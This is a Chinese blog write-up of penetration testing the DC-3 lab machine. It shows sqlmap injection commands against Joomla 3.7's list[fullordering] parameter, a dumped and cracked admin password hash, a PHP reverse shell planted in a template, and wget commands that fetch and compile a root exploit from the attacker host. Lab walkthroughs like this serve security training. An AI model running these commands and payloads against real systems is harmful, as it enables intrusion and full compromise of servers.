DC-3渗透实战

作者: 城市烈人 | 来源:发表于2019-06-10 14:35 被阅读172次

今后的靶机渗透,我尽量简单化,一些繁琐的过程我就不写出来了
直接写主要的步骤和想法思路

靶机IP:192.168.56.101

web渗透

http://192.168.56.101/administrator
发现是joomla建站
不想爆破了,发现了暴露出该cms的版本信息
http://192.168.56.101/README.txt

image.png

sql注入

不想盲测,直接上kali中search一下poc

searchsploit joomla 3.7
image.png

判断出有注入点,且注入点已知。直接跑跑sqlmap

注入语句:

1、爆库

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
image.png

2、爆表

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
image.png

3、爆字段数据

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
image.png
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' --dump -p list[fullorde
ring]
image.png

拿到了admin用户的密码hash

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

拿去md5解不出来,试试john爆解

john解hash

john hash
image.png

登录后台试试,成功登录

口令是:

admin   snoopy
![image.png](https://img.haomeiwen.com/i5178935/3798bbd7887f216d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

后台反弹getshell

进入后台后,选择Templates模板,选择templates第一个模板即可,在index.php页面中添加php反弹马


image.png

kali中开启监听


image.png

反弹成功

提权

先查看下该靶机的系统版本信息


image.png

老系统,也许有漏洞

随便拿一个试试

image.png

这个不行,再试试下一个

试了几个,发现这个可以


image.png

下载到靶机上


image.png
wget http://192.168.56.102/39772/compile.sh  
wget http://192.168.56.102/39772/doubleput.c  
wget http://192.168.56.102/39772/hello.crm
wget http://192.168.56.102/39772/suidhelper.c

之后

 ./compile.sh
 ./doubleput

拿到root权限


image.png

get flag

image.png

总结

1、发现了cms建站,注意版本等信息,可以直接找cms漏洞
2、进入后台,joomla直接上反弹马getshell
3、提权就比较难了,也是参照 国外的大牛的方法

靶机百度云下载
链接:https://pan.baidu.com/s/1al4ls7lx8zVq6s--Ik3RcQ
提取码:lbi4

相关文章

  • DC-3渗透实战

    今后的靶机渗透,我尽量简单化,一些繁琐的过程我就不写出来了直接写主要的步骤和想法思路 靶机IP:192.168.5...

  • 《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下

    《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下载 《Web渗透技术及实战案例解析.pdf》PDF...

  • 渗透实战:内网域渗透

    前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使...

  • MERCY渗透实战

    信息收集 开放的端口服务有: smb枚举探测 139和445的共享服务端口,用enum4linux探测一下 发现q...

  • Sedna渗透实战

    靶机IP:192.168.8.153任务:获取4个flag分别在shell,root,还有靶机中 这个靶机开放了好...

  • RootThis渗透实战

    靶机ip:192.168.8.150 nmap扫端口 单单只开放了80 web服务端口 dir爆目录 小字典不够用...

  • eric渗透实战

    靶机IP :192.168.56.103 nmap扫 靶机比较简单,只开启了22和80端口 nmap探测到了192...

  • SolidState渗透实战

    靶机IP:192.168.218.147 nmap全端口扫 靶机开了一些不明端口 跑目录没发现什么 邮箱渗透 nm...

  • HackInOS渗透实战

    HackInOS渗透实战 该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我...

  • WebDeveloper 渗透实战

    靶机IP:192.168.56.104 kali IP:192.168.56.101 nmap全扫 web渗透 既...

网友评论

    本文标题:DC-3渗透实战

    本文链接:https://www.haomeiwen.com/subject/podzxctx.html